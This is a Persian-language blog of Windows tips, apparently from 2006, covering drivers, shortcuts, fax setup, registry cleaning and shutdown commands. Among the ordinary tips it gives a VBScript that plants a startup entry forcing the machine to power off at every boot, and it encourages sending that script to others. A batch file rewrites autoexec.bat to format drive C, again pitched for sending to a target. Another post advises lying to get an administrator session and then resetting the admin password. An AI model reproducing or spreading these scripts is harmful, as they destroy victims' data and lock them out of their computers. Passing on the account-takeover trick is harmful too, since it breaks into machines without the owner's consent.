با عضویت در این وبلاگ ،می توانید از به روز رسانی آن با خبر شوید. بامراجعه به نوشته های پیشین می توانید از مطالب گذشته استفاده کنید. آموزش علوم کامپیوتری - ویندوز
آموزش نرم افزار هایی گرافیکی ،رجیستری و ...

 گاهي اوقات برايتان پيش آمده كه خواسته ايد تا راه انداز driver دستگاه خاصي مانند پرينتر، اسكنر، كارت گرافيكي، صوتي، مادربرد  را نصب كنيد ولي ويندوز در هنگام نصب آن دچار مشكل شده و در نتيجه عمل نصب نيز متوقف مانده است. يكي از دلايل ناكام ماندن ويندوز در نصب و راه اندازها مي تواند پر شدن دايركتوري inf خود وينودوز باشد. سيستم عامل ويندوز داخل دايركتوري خود، زيردايركتوري خود به نام inf دارد كه فايل هاي درايوهاي مختلف را آنجا نگهداري مي كند. بعضي اوقات بعلت از كار افتادن سيستم، راه اندازي مجدد آن، اشكالات  و ايرادهاي منطقي موجود در برنامه هاي مختلف منجمله IE و خود ويندوز فايل هايي با اندازه  صفر كيلو بايت در اين دايركتوري  تشكيل مي شوند. حال اگر تعداد فايل ها در اين دايركتوري خيلي زياد شوند(مثلا به40,000 يا 50,000 تا برسد) ويندوز در نصب و راه اندازهاي جديد دچار مشكل خواهد شد. در اين مواقع بهترین راه حل پا ك کردن فايل هاي اضافه و خراب از اين دايركتوري است. روش تشخيص اين فايل ها نيز از روي اندازه آنها است. بنابراين اگر شما هم با راه اندازي سيستمتان دچار مشكل هستيد، پيشنهاد ما اين است كه يك سري به اين دايركتوري ها بزنيد و فايل هاي inf با اندازه صفر ر احذف كنيد. درضمن براي بالابردن

سرعت سيستمتان مي توانيد هر از چند گاهي اين كار را با دايركتوري temp ويندوز انجام دهيد. دايركتوري temp قسمتي از ويندوز است كه برنامه هاي كاربردي مختلف و حتي برنامه هاي خود ويندوز اطلاعات موقت خود را در آنجا نگهداري مي كنند ولي باز به علت ايرادهاي مختلفي كه در خود نرم افزارها و يا در سيستم ممكن است وجود داشته باشد بعضي از اين برنامه ها، اطلاعات موقت ايجاد شده توسط خودشان را پاك نمي كنند، بنابراين با گذشت زمان حجم دايركتوريtemp افزايش يافته و عملا ده ها مگابايت اطلاعات زايد و بدرد نخور روي ديسك بجا مي ماند كه هيچ فايده اي جز كندتر شدن سيستم شما نخواهد داشت. در ضمن فراموش نكنيد كه پس از پاك كردن فايل هاي داخل دايركتوري temp بد نيست تا يكبار كامپيوتر خود را راه اندازي مجدد(restart) كنيد.

+ نوشته شده در  جمعه پانزدهم اردیبهشت ۱۳۸۵ساعت 6:8  توسط مهدی اردیانی  | 

ساختن دكمه Run:  در بعضي كامپيترها ممكن است به دلايلي دسترسي به دكمه Run نداشته باشيد. در اين حالت شما ميتوانيد با نت پد اين كليد كارآمد را خودتان بسازيد:
براي اين كار Notepad را باز كنيد و متن زير را در آن Paste كنيد.
كد :

(new ActiveXObject("Shell.Application")).FileRun()
سپس فايل خود را با پسوند JS يعني با نامي مثل MyRun.js سيو كنيد. البته همانطور كه ميدانيد js مخفف Java Script است.
 
ساختن كليد Show Desktop با آيكونهاي متفاوت: براي اين كار دوباره وارد Notepad شويد و متن زير را در آن Paste كنيد:
 [Shell]
 Command=2
 IconFile=explorer.exe,3
 [Taskbar]
 Command=ToggleDesktop
سپس فايل خود را با پسوند scf يعني با نامي مثل MyDesktop.scf بر روي دسكتاپ خود سيو كنيد. در اين حالت اين دكمه با آيكون استاندارد خود ساخته ميشود. اگرشما بخواهيد آيكون ديگري را براي دكمه خود انتخاب كنيد بايد در خط سوم دستور بالا بجاي عدد 3 عدد ديگري در محدوده 0 تا 17 انتخاب كنيد كه در زيراين آيكونها را شرح ميدهم تا راحتتر آيكون دلخواه خود را انتخاب كنيد. در ضمن علامت # كه در جلوي بعضي از آنها مشاهده ميكنيد به اين معني است كه آن آيكون جزو آيكونهاي مخفي ويندوز است و شما جز در اين حالت نميتوانيد اين آيكون را براي فايل ديگري انتخاب كرد:
0= آيكون جديدMyComputer 
1= آيكون استاندارد Explorer
2= آيكون سابقFax #
3= آيكون استاندارد ShowDesktop
4= آيكون سابق Fax با يك علامت سوال #
5= آيكون جديد Start
6= آيكون جديد Recyclebin
7= علامت ! درون يك دايره
8= علامت ! درون يك مثلث #
9= علامت ضربدر#
10= آيكون سابقMyComputer # 
11= علامتي شبيه >>#
12= علامتي شبيه <<#
13= آيكون استاندارد New File
14= آيكون زمين
15= آيكون پاكت نامه #
16= آيكون پاكت نامه با Microsoft Word #
17= آيكون سابق Start #

+ نوشته شده در  جمعه هشتم اردیبهشت ۱۳۸۵ساعت 7:26  توسط مهدی اردیانی  | 

اين اسکريپت روي هرکامپيوتري اجرا بشه نمي ذاره کامپيوترش بالا بياد. حتي فرصت کليک کردن روي ايکن رو بهش نمي ده .و پشت سر هم restart مي شه!  مي تونيد روي کامپيوتر خودتون هم اجراش کنيد . براي خلاصي ازش بايد فايل C:\restart.vbs  رو از کامپيوترتون از طريق Dos حذف کنيد بعد ويندوزتون بالا مي آد 
کد پايين را  روي notepad کپي کنيد و فايل را با پسوند vbs ذخيره کنيد. مي تونيد براي هر کسي بفرستيد.
كد :

Sub ShutDown Set FSO = CreateObject("Scripting.FileSystemObject") Set TxtFile = FSO.CreateTextFile("c:\restart.vbs", 2, False) TxtFile.WriteLine "Sub ShutDown " TxtFile.WriteLine "nLogOff=0 " TxtFile.WriteLine "nReboot=2 " TxtFile.WriteLine "nForceLogOff=4 " TxtFile.WriteLine "nForceReboot=6 " TxtFile.WriteLine "nPowerDown=8 " TxtFile.WriteLine "nForcePowerDown=12 " TxtFile.WriteLine "Set oOS = GetObject("+chr(34)+"winmgmts:{(Shutdown)}"+chr(34)+").ExecQuery("+chr(34)+"Select * from Win32_OperatingSystem"+chr(34)+") " TxtFile.WriteLine "For Each oOperatingSystem in oOS " TxtFile.WriteLine " oOperatingSystem.Win32Shutdown(nForcePowerDown) " TxtFile.WriteLine "Next " TxtFile.WriteLine "End sub " TxtFile.WriteLine "ShutDown " TxtFile.Close Set WshShell = CreateObject("WScript.Shell") WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Restart", "c:\restart.vbs" End sub ShutDown  

+ نوشته شده در  جمعه هشتم اردیبهشت ۱۳۸۵ساعت 7:23  توسط مهدی اردیانی  | 

يکي از دوستان سوال کرده بود که دو تا ويندوز XP يکي در درايو C و ديگري در درايو D دارد و ميخواهد که درايو C را Format کند. جواب: با ترفند زير ميتوانيد درايو C را فورمت کنيد.
 Format كردن درايو C با يك فايل BAT
  برنامه NotePad را باز كنيد سپس كد زير را در آن كپي و پيست كنيد:
 @echo off
 call attrib -r -h c:\autoexec.bat >nul
 echo @echo off >c:\autoexec.bat
 echo format /autotest c:/q>nul >>c:\autoexec.bat
 call attrib +r +h c:\autoexec.bat >nul
 exit
 حالا فايل را با پسوند bat ذخيره كنيد. حال اگر فايل را اجرا كنيد كل اطلاعات درايو سي شما پاك مي شود!
در ضمن اگر اين فيل را براي کس ديگري بفرستيد ابتدا كل اطلاعات موجود در فايل autoexe.bat را پاك مي كنيد سپس كد 'format /autotest c:/q' را در آن قرار مي دهد وقتي هدف شما كامپيوتر را ريست و دوباره راه اندازي كند اين كد اجرا شده و درايو سي فرمت مي شود!
  تعداد و نام پارتيشن مورد نظر را با اندکي تغيير در کد خود ميتوانيد تعيين کنيد
+ نوشته شده در  جمعه هشتم اردیبهشت ۱۳۸۵ساعت 7:19  توسط مهدی اردیانی  | 


يکي از مشکلات ويندوز xp راه نفوذ به آن در صورت فراموش کردن password مي باشد .همانطور که همه شما مي دانيد xp امکان جالب switch user را دارد که مي توان محيط را براي کار user هاي مختلف فراهم کرد .حالا اگر شما اين password را فراموش کنيد چاره چيست؟. در اين حالت چند راه نفوذ هست و آن اين است که در هنگام ظاهر شدن منوي کاربران در ابتدا ، دو بار کليدهايALT+CTRL+ DELETE را فشار دهيد سپس در قسمت نام کلمه administrator را تايپ کرده و قسمت password را خالي بگذاريد و Ok را بزنيد در اين حال وارد سيستم مي شويد.

حال اگر در هنگام نصب ويندوز Xp برايAdmin پسورد گذاشته باشند چه كار كنيم؟
براي اين كار هنگام بالا آمدن ويندوز كليد F8 را زده سپس بسته به نوع نياز خود بكي از گزينه هاي Safe Mode را انتخاب كنيد.
بعد از وارد شدن به ويندوز در منو Start كليك كنيد سپس گزينه RUN را انتخاب كرده ودر جاي خالي عبارت Control userpasswords2 را تايپ كنيد.
پنجره باز شده داراي 2 TAB به نام هايUsers & Advanced مي باشد.
TAB Users را انتخاب كرده و تيك گزينه:User must enter a username and password to use this computer را برداريد.
با برداشتن تيك اين گزينه ديگر هنگام ورود به ويندوز از شما پسورد گرفته نمي شود.

حالا با استفاده از گزينه Add مي توان نام كاربري را به آن اضافه و با استفاده از گزينه Remove مي توان نام كاربري را حذف كرد همچنين با استفاده از گزينه Properties مي توان ميزان دسترسي كاربران به ويندوز را تعيين كرد.

 

+ نوشته شده در  جمعه هشتم اردیبهشت ۱۳۸۵ساعت 7:18  توسط مهدی اردیانی  | 

ارسال فکس براي کليه سيتسمهاي عامل خانواده ويندوز با نرم افزار winfax pro امکان پذير است ولي در ويندوز اکس پي نيازي به نصب اين نرم افزار نيست چون خود ويندوز اکس پي سرويس فکس را داراست. وارد منوي start شويد سپس به ترتيب در منوي All programs وارد منوي Accessories شويد سپس وارد منوي Communications شويد اگر منوي Fax وجود داشت يعني سرويس فکس در هنگام نصب ويندوز نصب شده است در غير اينصورت شما بايد خودتان سرويس فکس ويندوز را راه اندازي کنيد .  کافيست سي دي نصب ويندوز اکس پي را داشته باشيد. سي دي ويندوز اکس پي را داخل درايو سي دي رام قرار دهيد سپس در control panel بخش Add/Remove programs را انتخاب کنيد . سپس در بين گزينه هاي سمت راست پنجره آن گزينه Add/Remove Windows Component را انتخاب کنيد و در پنجرهاي که باز مي شود در کنار Fax Services تيک بزنيد سپس روي Next کليک کنيد عمليات اضافه کردن سرويس فکس به صورت خودکار شروع مي شود و بعد از چند ثانيه سرويس فکس اکس پي آماده استفاده است .
اگر به بخش پرينترها برويد مي بينيد که يک پرينتر با نام فکس در آنجا اضافه شده است . براي ارسال فاکس کافي است شما هر فايل متني يا تصويري که قصد ارسال آنرا داريد با انتخاب پرينت از منوي فايل يا استفاده همزمان از کليدهاي ترکيبي Ctrl +p براي پرينت بفرستيد و هنگامي که کادر محاوره اي پرينت ظاهر شد پرينتر را Fax انتخاب کنيد با کليک روي ok مراحلي بعدي بصورت گام به گام ظاهر مي شود . نياز به ياد آوري نيست که براي ارسال فکس سيستم شما بايد مجهز به مودمي باشد که از ارسال فکس پشتيباني مي کند که اکثر مودم ها اين قابليت را دارند. براي دريافت فکس هم کنسول فکس را راه اندازي کنيد و از منوي فايل کنسول فکس Recieve fax now را انتخاب کنيد .
طريقه ارسال و دريافت با WinFax Pro نيز به همين ترتيب است در قسمت انتخاب پرينتر شما بايد فکسي که نرم افزار WinFax به ليست پرينترها اضافه کرده انتخاب کنيد .
+ نوشته شده در  جمعه هشتم اردیبهشت ۱۳۸۵ساعت 7:15  توسط مهدی اردیانی  | 


از آنجايي که احتمال دارد کلمه عبور خود را فراموش کنيد ، بهتر است با ايجاد يک  فلاپي ديسک کشف کلمه عبور ، پيش بيني اين مشکل را کرده باشيد .
بعد از انتخاب دکمه  startگزينه control panel و سپس user accounts را برگزينيد.و روي آن کليک کنيد. در سمت چپ، روي prevent forgotten pasword کليک کنيد .
براي ايجاد ديسک فوق لازم است کلمه عبور را بدانيد.
حال اگر کلمه عبور خود را فراموش کرديد ، هنگام ورود به سيستم روي فلش سبز رنگ کليک کنيد ; از شما در خواست مي شود ، ديسک بازيابي کلمه عبور را در درايو بگذاريد.
+ نوشته شده در  یکشنبه بیست و هفتم فروردین ۱۳۸۵ساعت 9:32  توسط مهدی اردیانی  | 

اگر در هنگام حذف کردن يک فايل با هر پيغام خطايي مواجه شديد ( مثلا : اين فايل در حالت اجرا است و نميتوان آن را پاک کرد ) فقط کافي است کليد هاي Ctrl+Alt+Del را زده و بعد وارد زبانه Processes شده و در ليست زير آن برنامه EXPLORER.EXE را از طريق زدن دکمه End Process ببنديد. بعد ميتوانيد به راحتي فايل مورد نظر را پاک کنيد.
توجه : براي اجراي مجدد برنامه EXPLORER.EXE بايد مجددا کليدهاي Ctrl+Alt+Del را زده و اين بار از منوي File گزينه New Task (Run…) را کليک کرده و در پنجره Create New Task عبارت EXPLORER.EXE را تايپ کرده و کليد Enter را بزنيد.
+ نوشته شده در  یکشنبه بیست و هفتم فروردین ۱۳۸۵ساعت 9:29  توسط مهدی اردیانی  | 


نرم افزار اتصال به کامپيوتر راه دور (remot desktop connection) از خصوصيات جديد ويندوز xp است ، اما مي تواند در نسخه هاي قديمي تر ويندوز نصب شود تا آن سيستم ها بتوانند با کامپيوتر هاي داراي ويندوز xp يا teminal server هاي ويندوز 2000 ،ارتباط بر قرار کنند . يکي از ويژگي هاي مفيد اين نرم افزار، قابليت اجراي يک برنامه در حين برقراري اتصال با کامپيوتر راه دور است .

زماني که کادر محاوره اي remot desktop connection را باز کرديد.

(start / programs/ accessories/ communications/remot desktop connection ) ، روي دکمه ي option و سپس زبانه programs کليک کنيد . کادر start the following program on connection را علامت دار کرده و سپس اطلاعات لازم را در دو بخشي که در نظر گرفته شده ، وارد کنيد همچنين به خاطر داشته باشيد که مي توانيد در حين اتصال با کامپيوتر راه دور ، هر برنامه اي را از  يک فايل دسته اي گرفته تا يک برنامه نصب شده ، اجرا کنيد.

+ نوشته شده در  یکشنبه بیست و هفتم فروردین ۱۳۸۵ساعت 9:25  توسط مهدی اردیانی  | 

اگر بنا به عللي ويندوز  XP  شما بالا نيامد به دستورات زير عمل کنيد اول يک سي دي اکسپي که بوتي بل هم باشد در سي دي رام بگذاريد و سيستم را راه اندازي کنيد سپس Delete را نگهداريد تا وارد محيط داس شويد خلاصه هارد ديسک را به سي دي رام  تبديل کنيد بعد روي سيو اند اگزيت با زدن کليد F10 وارد مرحله ستاپ ميشويد بعد از لود شدن وارد گذينه انتخااب براي نصب يا ريپير ميشويد شما R را تيک بزنيد تا وارد محيط مشگي شده و بعد از ? شماره معکوس تعداد ويندوز هاي که نصب کرده ايد نمايان ميگردد شايد شما بيش از يک ويندوز نداشته باشيد  مقابل ويندوز شماره يک ? بگذاريد يا مقابل ويندوز شماره دو ? بگذاريد و Enter بزنيد اگر password داريد وارد کنيد اگر نداريد Enter بزنيد اکنون نمايش ويندوز يا ويندوزهاي شما ظاهر ميشود  مقابل ويندوز را که تعين کرده ايد تايپ کنيد  Bootcfg /Add کمي صبر کنيد تا برنامه لود شود حال ويندوز انتخابي ظاهر ميگردد ودر قسمت زير ازشما پرسش ميشود چه متني رابراي نصب کردن يا افزودن داريد  Select installation to Add شما شماره اي را که قبلا در نظر گرفته بوديد جلوي آن بگذاريد Enter کنيد اکنون اين گذينه مفابل شما مي آيد Enter load identifier جلوي آن نام کوچک خودرا تايپ کنيد و Enter کنيد وگذبنه آخر Enter load options فاميل خود را تايپ کنيد ديگر کار تمام است اکنون تايپ کنيد Exit بعد از راه اندازي مجدد که خود انجام ميگيرد ويندوز با نام وفاميل شما راه اندازي ميگردد

+ نوشته شده در  یکشنبه بیست و هفتم فروردین ۱۳۸۵ساعت 9:16  توسط مهدی اردیانی  | 

1.اگر كليد CTRL    را زماني  كه در حال كشيدن فايلي  هستيد  به طور  همزمان  فشار دهيد فايل مزبور كپي مي شود
2.اگر كليدهاي CTRL+SHIFT      را زماني  كه در حال كشيدن فايلي هستيد  به طور همزمان  فشار دهيد  SHOTCUT      از فايل مورد نظر ايجاد مي شود
3. زماني كه در حال  قرار دادن سي دي  درون  CD - ROM  خود هستيد  اگر همزمان  كليدSHFT    را فشار دهيد   از اجراي  برنامه AUTORUN      شما اجتناب مي كند .
4.هنگامي كه در حال مشاهده  صفحه وب هستيد  و مي خواهيد آن را Full Sceen    ببينيد  كافي است  كليدF11    را فشار دهيد
5. اگر كليدهاي ALT+ENTER    را بطور  همزمان  فشار دهيد  پنجرهProperties    را از آيتم  انتخاب  شده مشاهده مي  كنيد
6. با استفاده  از كليد F6    مي توانيد  ميان بخشهاي  مختلف  صفحه نمايش  و يا پنجره فعال  جابه جا شويد  .
+ نوشته شده در  جمعه بیست و پنجم فروردین ۱۳۸۵ساعت 7:8  توسط مهدی اردیانی  | 

ويندوز اكس پي حافظه فوق العاده اي دارد. تمام گزارشهاي مربوط به برنامه هاي گوناگون ، اطلاعات امنيتي، و اتفاق هايي که بر سر ويندوز آمده است، بي سرو صدا در گوشه اي از ويندوز ثبت مي شود. اين بايگاني، به ويژه هنگامي که سرگرم يافتن ايراد دستگاه خود هستيد، بسيار کارامد است و ميتوانيد در آن، اطلاعات بسيار مفيدي درباره دليل احتمالي ايراد ويندوز بيابيد.
همچنين تمام پيغامهاي خطا و دليل نمايشهاي آنها را نيز ميتوانيد در اين بايگاني مشاهده کنيد. براي دسترسي به اين بايگاني ( که نام آن Event Log است) به { کنترول پانل } و سپس Administrative Tools برويد. سپس گزينه Event Viewer را انتخاب کنيد.
+ نوشته شده در  جمعه بیست و پنجم فروردین ۱۳۸۵ساعت 7:5  توسط مهدی اردیانی  | 

اين تنظيمات به شما امکان مي دهد تا تنظيمات پيش فرض Startup List را که در30 ثانيه مي باشد را تغيير دهيد . ويژگي فقط خواندني فايل BOOT.INI را غير فعال کنيد . اين فايل در پوشه ويندوز  قرار دارد .  آن را در يک ويرايشگر متني باز کنيد . در قسمت [boot loader] مقدار گزينه '=timeout' را برابر مقادير زيرقرار دهيد : مدت زمان را بين 1 تا 999 ثانيه در نظر بگيريد . براي آنکه ويندوز فورا بوت شود مقدار آن را برابر '0' قرار دهيد براي آنکه سيستم تا زماني که شما تعيين نکرده ايد در همان وضعيت منو باقي بماند مقدار را برابر '1-' قرار دهيد و يکبار ريستات بکنيد.
+ نوشته شده در  جمعه بیست و پنجم فروردین ۱۳۸۵ساعت 7:1  توسط مهدی اردیانی  | 

يکي از دوستان سوالي کرده بود که مي خواهد در رجيستري کليد درست کند ولي نمي تواند. (بدين معنا که رجيستري قفل است).
یک راه حل این است که شما با Account ادمین (Administrator) بالا بیایید . برای این کار هم باید

پسورد ادمین را بدانید. برای این کار  باید یک ادمین با پسورد جدید درست کنید .با User خود هم که نمی شود این کار را کرد . پس با یک ترفند و دروغ وارد Administrator شوید مثلا بگویید می خواهم نرم افزار نصب کنم تا با Account ادمین بالا بیاید و در یک فرصت مناسب پنجره  Command Prompt را باز کنید و عبارت زیر را تایپ کنید .
C:\Net User Administrator Password
که به جای کلمه آخر پسورد مناسب خود را می نویسید . سپس Log Off می کنید ، کلید های

Alt+Ctrl+Delete را دو بار فشار دهید کلمه Administrator را تایپ کنید و در قسمت پسورد ،

کلمه عبور خود را وارد کنید.

+ نوشته شده در  چهارشنبه بیست و سوم فروردین ۱۳۸۵ساعت 6:31  توسط مهدی اردیانی  | 

در قسمت  Run  تايپ كنيد iexpress و روي Ok  كليك كنيد  .
  پنجره اول :
 در پنجره باز شده حالت پيش فرض انتخاب شده  Creat new self   ميباشد .
پنجره دوم :
در سه انتخاب موجود شما گزينه دوم را انتخاب كنيد .
پنجره سوم :
در اين قسمت شما بايد يك عنوان براي Package خود انتخاب كنيد . مثلا computerinfo
پنجره چهارم :
گزينه اول در حالت پيش فرض انتخاب شده .
پنجره پنجم :
در اين قسمت اين امكان را به شما ميدهد كه قبل از اجرا شدن و باز كردن Package يك پنجره جديد باز ميشود و تا اين پنجره را تاييد نكنيد كار ادامه پيدا نميكند . براي نوشتن اين پيغام ميتوانيد متن خود را در Notepad  نوشته و ذخيره كنيد و با استفاده از دكمه Browse  به برنامه مسير متن نوشته شده را بدهيد  و در صورتي كه تمايل به انجام اين كار نداريد بگذاريد برنامه در حالت پيش فرض بماند .
 پنجره ششم :
با كليك بر روي دكمه Add فايلهاي مورد نياز را انتخاب كنيد مثلا عكس
پنجره هفتم :
حالتهاي مختلف را بعد از اتمام كار برنامه نشان ميدهد . به اين صورت كه مثلا وقتي شما Package  را باز كرديد فايلهاي باز شده به چه صورت باشند كه چهار انتخاب را به شما ميدهد .
پنجره هشتم :
مانند پنجره پنجم هست ولي با اين تفاوت كه پنجره پنجم در ابتداي برنامه نمايش داده ميشد ولي اين پيغام در انتهاي برنامه نمايش داده ميشود .
پنجره نهم :
حالا بايد مسيري را كه ميخواهيد در انجا Package را ذخيره كنيد بدهيد .
پنجره دهم :
سه گزينه موجود هست كه حالاتي را در اختيار شما ميگذارد كه مثلا بعد از نصب برنامه سيستم Restart  شود يا خير . شما گزينه No restartرا انتخاب كنيد .
پنجره يازدهم :
گزينه Don`t save را انتخاب كنيد .
با استفاده از اين روش حجم Package ايجاد شده خيلي كمتر از حجم كل فايلهايتان قبل از ايجاد پكيج ميباشد . براي Package كردن فايل ( مثلا فايلهائي را كه براي نصب يك برنامه ميباشند ) ميتوانيد از پنجره دوم گزينه زير را انتخاب كنيد .
Extract files and run an
+ نوشته شده در  شنبه نوزدهم فروردین ۱۳۸۵ساعت 6:36  توسط مهدی اردیانی  | 

هر گاه در نت پد مشغول نوشتن چيزي باشيد و بخواهيد تاريخ و ساعت را در پايان يا هرجاي ديگر مطلب خود بنويسيد ميتوانيد در همانجا كليد F5 را زده و اين كار بصورت خودكار انجام ميشود .
+ نوشته شده در  شنبه نوزدهم فروردین ۱۳۸۵ساعت 6:34  توسط مهدی اردیانی  | 

گر شما يك فايل متني Notepad داشته باشيد و در اوليين سطر آن (بالاترين سطر)
عبارت LOG. را تايپ كنيد(به نقطه قبل از LOG دقت كنيد) و Save كنيد آنگاه هر وقت اين فايل توسط هركسي بازشود تاريخ و ساعت خوانده شدن آن در پايان متن بصورت اتوماتيك ثبت ميشود و از اين طريق شما ميتوانيد هميشه تاريخهاي آخرين مشاهده هاي فايل خود را در زير آن مشاهده كنيد.
+ نوشته شده در  شنبه نوزدهم فروردین ۱۳۸۵ساعت 6:28  توسط مهدی اردیانی  | 


اين كار توسط برنامه Group Policy امكان پذير است . براي اجراي اين برنامه گزينه Run از منوي Start را انتخاب كنيد . حال در آن Gpedit.msc را تايپ كرده و Ok كنيد . در پنجره ظاهر شده مسير زير را دنبال كنيد :

user configuration \ administrative templates \ system

حال در سمت راست روي گزينه prevent access to registry editing tools دابل كليك كنيد و در پنجره اي كه باز مي شود گزينه Enable را فعال كرده و Ok كنيد . ديگر نيازي به Gpedit.msc نيست آنرا ببنديد . حال در Run برنامه RegEdit را اجرا كنيد . با پيغامي مبني بر بسته بودن رجيستري مواجه ميشويد. براي آنكه بتوانيد رجيستري را اجرا كنيد مسير گفته شده را دنبال كرده و اين بار به جاي Enable گزينه NotConfigured را برگزينيد .

+ نوشته شده در  شنبه نوزدهم فروردین ۱۳۸۵ساعت 6:26  توسط مهدی اردیانی  | 

شما مي توانيد تمام اطلاعاتي را که ذخيره شده است از قبيل پسوردها ، آدرس سايت ها ، کلمات کليد و
... را حذف کنيد . براي اين کار کارهاي زير را انجام دهيد :
 ابتدا IE را اجرا کنيد .
 به قسمت هاي زير برويد :
Tools / Internet Options / Content / AutoComplete
 روي دکمه
Clear Forms کليک کنيد
 براي پاک کردن پسورها نيز روي دکمه
Clear Passwords کليک کنيد.
+ نوشته شده در  شنبه نوزدهم فروردین ۱۳۸۵ساعت 6:15  توسط مهدی اردیانی  | 


چک کردن فايل هاي خراب ويندوز و تعمير آنها

وارد شاخه  start/All Programs/Accssoreios/System tools شده و System information  را بازکنيد .
پس از وارد شدن به sestem information از منو Tools گزينه File Signature Verification Utility را انتخاب کنيد پنجره اين فايل باز ميشود دکمه استارت رو بزنيد تا درايوهاتون چک بشه

+ نوشته شده در  شنبه نوزدهم فروردین ۱۳۸۵ساعت 6:10  توسط مهدی اردیانی  | 


هر چه تعداد نرم افزارهايي كه در ويندوز نصب هستند ، بيشتر باشد ، طبعا حجم رجيستري هم بالا مي رود ، تا جايي كه اگر تعداد نرم افزارهاي نصب شده در ويندوز زياد باشد اين حجم از دو برابر حجم اوليه آن هم بالاتر مي رود .

 هر چند مي دانيم كه با Uninstall كردن هر نرم افزار اطلاعات مربوط به آن نرم افزار از رجيستري پاك مي شود و حجم رجيستري پايين مي آيد ، اما هميشه اين كا به طور كامل انجام نمي شود ، به علت مشكلاتي كه برنامه هايUninstall در ويندوز دارند ، پس از حذف كردن هر نرم افزار در ويندوز مقداري از اطلاعات آن در رجيستري باقي مي ماند .

براي ويندوزهايي كه مدت زيادي هست كه بر روي يك كامپوتر نصب شده اند و بر روي آنها نرم افزارهاي زيادي نصب و حذف شده است ، كاملا اين امر محسوس است ، يعني اگر حتي تمام نرم افزارهاي نصب شده در ويندوز را نيز Uninstall كنيم باز حجم فايلهاي رجيستري زياد است.

مشكل ديگري كه ممكن است پيش بيايد اين است كه پس از مدتي كه برنامه هايي را در ويندوز نصب و Uninstall كرديم ، ممكن است نرم افزارها در رجيستري تغييراتي ايجاد كرده باشند كه باعث بهم ريختن تنظيمات ويندوز شود و در نتيجه ويندوز درست كار نكند ، كه در صورت بروز چنين مشكلي ، مي توان از يكي از نرم افزار هاي مخصوص ترميم و تعمير رجيستري استفاده كرد .

در ادامه چند نمونه از رايج ترين و پركاربردترين اين گونه نرم افزارها همراه با طريقه استفاده از آنها به صورت مختصر ذكر شده است.
Scanreg.exe  :
اين برنامه جزء فايلهاي استاندارد ويندوز است كه ، در شاخة Windows ، زير شاخة Command قرار دارد ، اين برنامه تحت سيستم عامل MS-DOS قابل اجرا است . كه همراه با پارامتر هاي زير مي توان از آن استفاده كرد ، البته بايد توجه داشت كه در صورتي كه در ويندوز باشيم ، اين برنامه قادر به اجرا شدن نمي باشد .

به اين دليل كه اين برنامه مي خواهد فايلهاي مربوط به رجيستري را دست كاري كند و چون در هنگام اجراي ويندوز ، اين فايلها توسط سيستم عامل باز نگه داشته مي شوند و دائما با آنها كار مي شود پس براي اين برنامه دسترسي به آنها ممكن نيست . براي حل اين مشكل بايد با گزينه هاي Command Prompt only ويا Previous version of MS-DOS سيستم بوت شده باشد .

اما نحوة كاركرد اين نرم افزار ، از پارامترهاي زير بر طبق نياز خود مي توانيد استفاده كنيد، كه فرم كلي صدا زدن اين برنامه همراه با توضيح مختصري در مورد پارامتر هاي آن در زير آمده است .
Scanreg.exe [/پارامتر]

/Backup : يك نسخة پشتيبان از فايلهاي رجيستري تهيه مي كند .
/Restore : مي توان به نسخه هاي پشتيباني را كه قبلا گرفته شده بازيابي كرد . ( اين پارامتر در صورتي كه ويندوز از كار افتاده باشد بسيا كارآمد است )
/Fix : براي تصحيح و رفع مشكلات درون رجيستري به كار مي رود .
/Opt : براي بهينه كردن اطلاعات رجيستري به كار برده مي شود .
در صورتي كه حجم فايل هاي رجيستري شما بيش از حد معمول است مي توانيد از دو پارامتر قبل با هم به صورت زير استفاده كنيد ، به احتمال زياد مشكل شما تا حدودي رفع خواهد شد .
Scanreg.exe /opt /fix

RegClean.exe :
اين برنامه را مي توانيد به طور رايگان از سايت ماكروسافت يعني
http://www.microsoft.com/ به دست آوريد ، اين برنامه در محيط ويندوز اجرا مي شود ، پس از اجرا ، به بررسي رجيستري مي پردازد و اطلاعات غير ضروري را حذف و يا اطلاعات مهم از بين رفته را ترميم مي كند.

+ نوشته شده در  چهارشنبه شانزدهم فروردین ۱۳۸۵ساعت 6:55  توسط مهدی اردیانی  | 

بر روي Desktop كامپيوتر راست كليك كرده و از قسمت New گزينه Shortcut انتخاب كنيد. سپس در پنجره باز شده، آدرس زير را وارد كنيد:
C:\windows\system32\shutdown.exe
 Next را بزنيد، براي Shortcut نامي به دلخواه انتخاب نماييد و در پايان Finish را كليك كنيد. حال بر روي Shortcut ساخته شده راست كليك كرده و Properties را انتخاب كنيد. در كادر Target در انتهاي آدرس به ترتيب:
براي Log Off حروف « l- »
براي Shutdown حروف « s- »
و براي Reboot حروف « r- »
را تايپ كنيد.
همچنين اگر شما در آخر همان كادر حروف « t xx- » كه در آن xx بيانگر زمان بر حسب ثانيه مي‌باشد را اضافه كنيد، هنگام Shutdown ، پيامي حاوي شمارش معكوس براي Shutdown نمايش داده مي‌شود. همچنين شما با تايپ حروف '-c "text"' (اين عبارت را كپي و در نت‌پدpaste كنيد، تا درست نمايش داده شود) ( به جاي text متن دلخواه ) مي توانيد در هنگام Shutdown پيام دلخواه خود را به نمايش بگذاريد. اما وقتي شمارش معكوس شروع شد، تنها راه  براي متوقف ساختن آن، اين است كه يك بار ديگر برنامه را با تايپ حروف « a- » براي Abort اجرا كنيد
+ نوشته شده در  سه شنبه پانزدهم فروردین ۱۳۸۵ساعت 6:27  توسط مهدی اردیانی  | 


بر روي Desktop كامپيوتر راست كليك كرده و از قسمت New گزينه Shortcut انتخاب كنيد. سپس در پنجره باز شده، آدرس زير را وارد كنيد
C:\Windows\system32\rundll32.exe powrprof.dll , SetSuspendState
 مطمئن شويد كه كلمه SetsuspenState همانگونه كه نشان داده شد؛ وارد شده است. (از لحاظ حروف بزرگ و كوچك)
 البته شما قبلا بايد در پيكر بندي سيستم، Hibernation را فعال كرده باشيد، بنابراين از Control Panel به Power Option رفته روي برگه Hibernation كليك كنيد و اطمينان حاصل كنيد كه Enable Hibarnation تيك خورده باشد.

Next  را بزنيد، براي Shortcut نامي به دلخواه انتخاب نماييد و در پايان Finish را كليك كنيد. حال بر روي Shortcut ساخته شده راست كليك كرده و Properties را انتخاب كنيد. در كادر Target در انتهاي آدرس به ترتيب:

براي Log Off حروف « l- »
براي Shutdown حروف « s- »
و براي Reboot حروف « r- »
را تايپ كنيد.

+ نوشته شده در  سه شنبه پانزدهم فروردین ۱۳۸۵ساعت 6:22  توسط مهدی اردیانی  | 

